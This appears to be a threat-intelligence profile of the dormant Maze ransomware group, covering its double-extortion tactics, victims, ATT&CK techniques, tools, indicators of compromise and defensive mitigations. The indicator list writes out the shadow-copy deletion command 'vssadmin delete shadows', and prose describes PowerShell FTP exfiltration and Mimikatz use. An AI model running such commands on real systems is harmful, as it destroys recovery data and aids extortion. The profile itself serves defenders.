analyst @ nohacky :~/threat-actors $
cat / threat-actors / maze-team-twisted-spider
analyst@nohacky:~/maze-team-twisted-spider.html
dormant profile
type Ransomware
threat_level High (Legacy)
status Dormant
origin Eastern Europe — ransomware operators
last_updated 2025-03-27
MZ
maze-team-twisted-spider

Maze Team / Twisted Spider

also known as: TWISTED SPIDER TA2101 GOLD VILLAGE DEV-0216 Storm-0216 TUNNEL SPIDER UNC2198

The group that fundamentally changed ransomware economics by inventing double extortion. Before Maze, ransomware was defeatable with backups. Maze changed that: in November 2019 the operators contacted BleepingComputer to announce they had stolen Allied Universal's unencrypted data and would publish it publicly if the ransom went unpaid — creating a data breach within every ransomware incident. The tactic was copied by virtually every major ransomware operation that followed. Maze announced shutdown in October 2020 after 18 months of high-profile attacks, but strong code and TTP overlaps with Egregor and Sekhmet indicate the operators rebranded rather than retired.

attributed origin Eastern Europe (Russia assessed)
suspected sponsor None — financially motivated
operational period May 2019 — October 2020
primary motivation Financial — double extortion ransomware
primary targets IT Services, Manufacturing, Government, Healthcare, MSPs
known victims 100+ confirmed
mitre att&ck group G0092 (Maze)
target regions Global — US, Europe, UK priority
threat level High (TTPs actively inherited)

Overview

Maze Team — tracked by CrowdStrike as TWISTED SPIDER and by Proofpoint as TA2101 — operated the Maze ransomware from May 2019 through October 2020, a period of 18 months that permanently altered the ransomware threat landscape. The malware itself began as ChaCha ransomware, first identified by Malwarebytes Director of Threat Intelligence Jérôme Segura in May 2019, before the operators rebranded and expanded operations under the Maze name.

The innovation that defined Maze was not technical sophistication — it was strategic. By November 2019, the operators had recognized that the growing adoption of offline backups was eroding ransomware's leverage. Their response was to add data theft as a prerequisite to encryption, then demonstrate follow-through by contacting BleepingComputer to announce they had exfiltrated 700GB of data from Allied Universal and would release it if payment was not made. When Allied Universal did not pay, Maze published a portion of the data — the first time a ransomware group had publicly executed this threat in such a deliberate, media-facing way. The concept spread immediately: REvil launched a leak site, DoppelPaymer and Clop followed, and by 2020 double extortion had become the industry standard for big-game hunting ransomware groups.

Beyond inventing the tactic, Maze institutionalized it. The operators created a dedicated public "Maze News" leak site, issued formal press releases about victims, and cultivated relationships with cybersecurity journalists to amplify the reputational pressure on organizations that refused to pay. In June 2020, Maze formed the Maze Cartel — a collaboration with VIKING SPIDER (Ragnar Locker) and LockBit operators to cross-host victim data on each other's leak sites, further complicating victim recovery and negotiation. The group operated as an affiliate-based RaaS, with a core development team and distributed operators conducting intrusions.

Attribution to Eastern Europe and likely Russia rests on the malware's CIS language exclusion: Maze terminates without encrypting if the system's language is set to Russian, Ukrainian, Belarusian, or other former Soviet states — a standard operational security practice among Russian-origin criminal groups protecting against domestic prosecution. No core Maze operators have been publicly arrested or identified.

decryption keys released — february 2022

In February 2022, decryption keys for Maze, Egregor, and Sekhmet were released via a BleepingComputer forum post, attributed to the malware developer. Emsisoft confirmed the keys were legitimate and released a free decryptor. Analysts assessed the release was likely triggered by mounting law enforcement pressure following the arrest of REvil members, as the keys' release eliminated any lingering extortion value against unpaid victims. Any organization still holding encrypted Maze data can use Emsisoft's free decryptor to recover files.

Target Profile

Maze targeted organizations across virtually every sector during its operational period, with particular focus on large enterprises where stolen data would carry maximum reputational and regulatory leverage.

  • IT services and managed service providers: MSPs were a particularly high-value target because a single compromise could provide access to multiple client networks. The Cognizant attack in April 2020 exemplified this: as one of the world's largest IT services providers, the breach disrupted services across Cognizant's global client base simultaneously.
  • Manufacturing and industrial: Large manufacturers with proprietary designs, production schedules, and supplier relationships were targeted for both data sensitivity and operational disruption potential. Southwire, a major cable manufacturer, was an early victim in late 2019.
  • Technology and electronics: Canon, LG Electronics, and Xerox were all confirmed victims in 2020. These companies held sensitive intellectual property and faced significant reputational damage from the prospect of data leaks.
  • Government and public sector: The City of Pensacola, Florida was targeted in late 2019. Government entities were attractive due to public sector data sensitivity and the political pressure to avoid prolonged service disruption.
  • Healthcare: Despite publicly stating an aversion to attacking frontline healthcare during the COVID-19 pandemic, the group did target healthcare-adjacent organizations. The stated avoidance was operationally convenient — healthcare organizations under crisis conditions are less likely to engage fully in ransom negotiations.
  • Finance, legal, insurance, and energy: Mandiant incident response engagements documented Maze activity across financial services, legal firms, insurance companies, and energy organizations, reflecting the group's broad targeting without a single-sector focus.

Tactics, Techniques & Procedures

Maze operated as a RaaS with multiple affiliate teams conducting intrusions, leading to variation in initial access methods across observed incidents. The post-compromise phase — lateral movement, data exfiltration, and ransomware deployment — was more consistent across affiliates.

mitre id technique description
T1566.001 Spear-Phishing Attachment A primary initial access method across multiple affiliate teams. Malicious Office documents with macros impersonating government agencies (German Ministry of Finance, Italian Revenue Agency) were documented in Proofpoint's TA2101 tracking. Macros downloaded Maze to %TEMP% and executed it. Italian and German targets were specifically named in early 2019 government-themed campaigns.
T1190 Exploit Public-Facing Application Maze exploited vulnerabilities in Pulse VPN and Windows VBScript Engine Remote Code Execution to gain network footholds. These vulnerabilities were particularly valuable for targeting organizations without patched remote access infrastructure during the shift to remote work in early 2020.
T1133 External Remote Services RDP with stolen credentials was a documented initial access vector across multiple Maze intrusions. Exposed RDP was especially relevant during the COVID-19 period when organizations rapidly deployed remote access without adequate security controls. RDP also served as a lateral movement mechanism once inside target networks.
T1059.001 PowerShell — Data Exfiltration Base64-encoded PowerShell scripts uploaded files with .7z extensions to attacker-controlled FTP servers using hard-coded credentials. A variant of a script originally posted to Microsoft TechNet was documented across multiple incidents. WinSCP was used as an alternative exfiltration mechanism in other observed cases.
T1486 Data Encrypted for Impact Maze used ChaCha and RSA encryption algorithms to encrypt victim files. The malware first collects system information including drive configuration, OS version, language settings, username, and computer name — varying ransom amounts based on whether the target is a home system, workstation, or enterprise server. CIS language detection terminates execution without encryption.
T1657 Financial Theft / Double Extortion The defining innovation of the Maze operation. Data exfiltration precedes encryption, enabling a second ransom demand for non-release of stolen data. Maze was the first group to execute this publicly at scale — publishing Allied Universal's data in November 2019 after they declined to pay. The Maze News leak site published stolen data as social pressure on non-paying victims, and the group issued press releases to amplify coverage.
T1078 Valid Accounts / Credential Harvesting Mimikatz was used post-compromise for credential dumping. Harvested credentials enabled lateral movement across domain-joined systems and escalation to domain administrator privileges required for full network compromise and mass ransomware deployment. The malware also attempted to enumerate network resources via null session connections.
T1057 Process Discovery / Network Reconnaissance Maze performed extensive network enumeration before deploying ransomware — identifying domain controllers, backup systems, and high-value data stores to maximize exfiltration and encryption impact. BloodHound was observed in some Mandiant incident response engagements for Active Directory reconnaissance, enabling more effective privilege escalation and lateral movement planning.
T1490 Inhibit System Recovery Maze deleted Volume Shadow Copies and targeted backup infrastructure specifically to prevent file recovery without paying the ransom. This was particularly critical given that Maze's entire value proposition rested on defeating the backup-as-defense strategy. Removing recovery options maximized the ransom leverage of the encryption component.
T1583 Infrastructure Acquisition — Cartel Data Sharing Maze established the Maze Cartel in June 2020 — a cross-group collaboration with VIKING SPIDER (Ragnar Locker) and LockBit operators to cross-host victim data on multiple dedicated leak sites. This infrastructure arrangement meant victims faced data exposure across multiple platforms simultaneously, complicating both technical takedown efforts and ransom negotiations.

Known Campaigns

Key operations across the 18-month active period, selected for their historical significance in establishing or demonstrating the double extortion model.

Government-Themed Phishing — Germany and Italy 2019

Among the earliest documented Maze campaigns, tracked by Proofpoint as TA2101. Operators sent spam emails impersonating Germany's Bundeszentralamt fur Steuern (Federal Ministry of Finance) and Italy's Agenzia Entrate (Internal Revenue Service), attaching malicious Office documents with macros. The Italian campaign used a document named VERDI.doc described as an "interactive tool," a social engineering ploy to encourage macro enabling. When macros were activated, scripts downloaded and executed Maze from the %TEMP% directory. The group also distributed Cobalt Strike in parallel campaigns using the same government impersonation infrastructure.

Allied Universal — First Public Double Extortion 2019

The defining moment in ransomware history. After encrypting Allied Universal — a major US security staffing firm — Maze operators contacted BleepingComputer to announce they had exfiltrated the company's unencrypted data and would release it if a ransom of approximately $2.3 million in Bitcoin was not paid. When Allied Universal declined to pay, the operators published 700MB of stolen data publicly — the first publicly documented execution of this threat by a ransomware group. The Maze News site was established as a permanent infrastructure for future data publication. This single action fundamentally changed the calculus of ransomware defense worldwide.

City of Pensacola, Florida 2019

Maze attacked Pensacola's municipal systems and exfiltrated 2GB of city data, publishing it as proof of compromise. The attack disrupted city services and demonstrated that public sector targets were viable double extortion victims — the public nature of government data breaches and the political pressure to restore services quickly made municipalities particularly susceptible to the new model.

Cognizant — Fortune 500 MSP Attack 2020

The April 2020 attack on Cognizant — one of the world's largest IT services providers — became the flagship example of Maze targeting MSPs for multiplied impact. The attack encrypted and disabled internal systems, forced Cognizant to take other infrastructure offline, and disrupted services for Cognizant's global client base including ING, Standard Life, Mitsubishi Motors, and PeopleSoft. Several clients proactively severed Cognizant's network access as a protective measure, effectively pausing active projects. The breach exposed personal information including Social Security numbers, tax IDs, financial data, driver's licenses, and passports. Cognizant estimated the immediate financial impact at $50–70 million — one of the highest publicly disclosed ransomware costs at that point in time.

Maze Cartel Formation — LockBit and Ragnar Locker 2020

In June 2020, Maze announced the creation of the Maze Cartel — a formal collaboration agreement with VIKING SPIDER (Ragnar Locker operators) and LockBit, under which victim data from any cartel member's attack could be hosted on multiple cartel members' leak sites simultaneously. This arrangement benefited newer or less-established operators by associating their data with Maze's established reputation, increasing the credibility of the extortion threat. It also distributed the data across multiple infrastructure points, making targeted takedowns by law enforcement or hosting providers less effective. SunCrypt claimed cartel membership in August 2020, but Maze publicly denied the claim.

Canon and Xerox — Major Corporate Targets 2020

In August 2020, Canon confirmed an attack affecting around 25 domains and multiple internal applications. Maze claimed to have exfiltrated 10TB of data. Users of Canon's free image.canon cloud storage service permanently lost data stored before June 16, 2020. Canon acknowledged the storage loss but disputed claims of image data leakage. Xerox was also hit, with Maze publishing over 100GB of Xerox data on the leak site. The Canon attack in particular drew attention to the unique damage posed by exfiltration against companies with large customer data sets — the stolen data included customer-facing service data, not just internal corporate documents.

Shutdown Announcement and Egregor Emergence 2020

In October 2020, Maze operators published a "press release" on their leak site announcing shutdown of operations, stating they had ceased encrypting new victims in September. The announcement was skeptically received: Egregor, a ransomware variant based on the Sekhmet malware family, had emerged in September 2020 — precisely as Maze began winding down — and shared Maze's ChaCha and RSA encryption algorithms, double extortion model, dedicated leak site format, and ransom note structure. Sophos and other researchers documented that Egregor affiliates were former Maze affiliates who had migrated simultaneously. The pattern matched GandCrab's earlier "retirement" followed by the emergence of REvil. Maze decryption keys were released in February 2022, providing free recovery for all victims with encrypted data.

Tools & Malware

Maze operated a mixed toolset — a proprietary ransomware payload supplemented by a broad range of legitimate administrative and penetration testing tools for post-exploitation phases.

  • Maze ransomware (ChaCha/RSA): The core ransomware payload using ChaCha stream cipher for file encryption and RSA for key protection. Evolved from ChaCha ransomware. Appends randomized file extensions to encrypted files and drops DECRYPT-FILES.txt in each affected folder. Performs system and network reconnaissance before encryption, varying ransom amounts based on system role. Terminates without encrypting if CIS language settings are detected.
  • Cobalt Strike: Commercial post-exploitation framework used consistently across Maze intrusions for lateral movement, privilege escalation, and persistent access. Cobalt Strike beacons provided command-and-control between initial compromise and final ransomware deployment — a standard BGH toolkit element shared with most contemporary ransomware groups.
  • Mimikatz: Open-source credential dumper used post-compromise to extract Windows credentials from LSASS memory, enabling domain escalation and lateral movement across AD-joined environments. Documented in multiple Mandiant incident response cases involving Maze.
  • BloodHound: Open-source Active Directory reconnaissance tool used to map trust relationships, identify shortest paths to domain administrator, and plan privilege escalation. Documented in some Mandiant Maze incident response engagements as a network mapping component.
  • WinSCP / PowerShell FTP scripts: Used for data exfiltration. PowerShell scripts encoded in base64 uploaded .7z archives to attacker-controlled FTP servers. WinSCP provided an interactive alternative for manual exfiltration. Both were observed across multiple incident response cases with minor script variations between affiliate teams.
  • Exploit kits (Fallout EK, Spelevo EK): In early campaigns before the shift to targeted post-compromise deployment, Maze was distributed via the Fallout and Spelevo exploit kits targeting Flash Player vulnerabilities on compromised or malicious websites.
  • Egregor (successor): A ransomware strain based on the Sekhmet malware family, emerging in September 2020 as Maze shut down. Shares ChaCha and RSA encryption, double extortion model, affiliate structure, and TTP patterns with Maze. Strong researcher consensus that Egregor represents a Maze rebrand. Egregor itself shut down following arrests of affiliates in Ukraine by French and Ukrainian law enforcement in February 2021.

Indicators of Compromise

Historical IOCs from documented Maze campaigns. Maze is dormant and these serve as attribution anchors and threat hunting reference material. The Emsisoft free decryptor renders encryption recovery possible for any remaining unpaid victims.

historical iocs — active threat has shifted to egregor/successor operations

Maze has been dormant since October 2020. These IOCs are provided for historical attribution and threat hunting reference only. For organizations investigating current incidents with Maze-like behavior, pivot to Egregor, Sekhmet, and successor group indicators. The TTPs documented here remain relevant because successor groups directly inherited Maze's techniques.

indicators of compromise — behavioral and structural
ransom note DECRYPT-FILES.txt — dropped in each folder containing encrypted files
file extension Randomized alphanumeric extension appended to encrypted files (varies per victim)
behavior vssadmin delete shadows — shadow copy deletion pre-encryption
behavior Null session network enumeration to identify domain role before encryption
exfil method Base64 PowerShell → FTP upload of .7z archives to attacker-controlled server
exfil method WinSCP interactive transfer to attacker FTP infrastructure
exclusion Skipped folders: %windir%, %programdata%, Program Files, %appdata%\local
exclusion Skipped extensions: .dll, .exe, .lnk, .sys
c2 protocol HTTP POST on port 80 using WS2_32.dll — system info exfiltration to C2 on execution

Mitigation & Defense

Although Maze itself is dormant, its TTPs persist directly in Egregor, Sekhmet, and the broader double-extortion ransomware ecosystem it created. These mitigations are relevant against any current ransomware operator using the model Maze established.

  • Treat every ransomware incident as a data breach: Maze's core contribution to the threat landscape is the assumption that data has been exfiltrated before encryption. Incident response plans must include data exfiltration investigation alongside ransomware remediation. Do not assume that restoring from backups eliminates the incident — the stolen data remains an independent extortion vector.
  • Patch VPN and remote access vulnerabilities promptly: Pulse VPN exploitation was a documented Maze entry path. Unpatched remote access infrastructure — VPN appliances, RDP, Citrix — remains a primary initial access vector across the entire double extortion ransomware ecosystem. Prioritize these in patch cycles and enforce MFA on all remote access.
  • Block or strictly control RDP exposure: RDP was a consistent Maze entry path. RDP should never be directly exposed to the internet. Where RDP access is required, enforce MFA, restrict source IPs via firewall rules, and monitor for authentication anomalies including off-hours access and geographically inconsistent logins.
  • Macro and Office hardening: Government-impersonation Office document campaigns were an early Maze delivery method. Disable macros from internet-originated documents via Group Policy. Deploy Attack Surface Reduction rules targeting Office macro execution. Educate users about government-impersonation lures — a tactic shared with many successor groups.
  • Offsite and immutable backup architecture: Maze specifically deleted shadow copies and targeted backup systems. Backups must be stored in locations unreachable from the production domain — air-gapped, offline, or cloud-hosted with immutability controls. Test restoration procedures regularly. The backup must be inaccessible to domain-admin-level credentials.
  • Monitor for FTP exfiltration and WinSCP usage: Alert on WinSCP execution from non-administrative systems and on PowerShell invoking FTP-related functions. Outbound FTP traffic from enterprise workstations has no legitimate use in most environments and should be blocked at the perimeter firewall.
  • Cobalt Strike and BloodHound detection: Both tools are standard in the Maze-derived ransomware playbook. EDR solutions should detect Cobalt Strike beacon injection patterns and BloodHound's SharpHound collection activity. Monitor for ADFind.exe and BloodHound/SharpHound execution as pre-ransomware reconnaissance indicators.
  • Dedicated leak site monitoring: Organizations in high-risk sectors should monitor threat intelligence feeds and dark web monitoring services that track ransomware leak sites. Early identification of data publication can inform legal, regulatory, and communication responses. Several threat intelligence platforms provide automated leak site monitoring.
analyst note

Maze's historical significance is that it solved a specific problem for ransomware operators — the backup problem — in a way that has proven permanently effective. Every major ransomware group operating since 2020 uses double extortion as a baseline, not an innovation. The model was replicated so rapidly because it required no technical capability beyond the ability to exfiltrate data before encrypting it, and because it converted a single ransom event into a two-vector extortion. The Maze Cartel concept also previewed the affiliate ecosystem structure — now standard across RaaS operations — where data infrastructure is shared to increase pressure on victims. Understanding Maze is prerequisite to understanding how ransomware actually works today. Its operational period ended in 2020; its influence has not.

Sources & Further Reading

Attribution and references used to build this profile.

— end of profile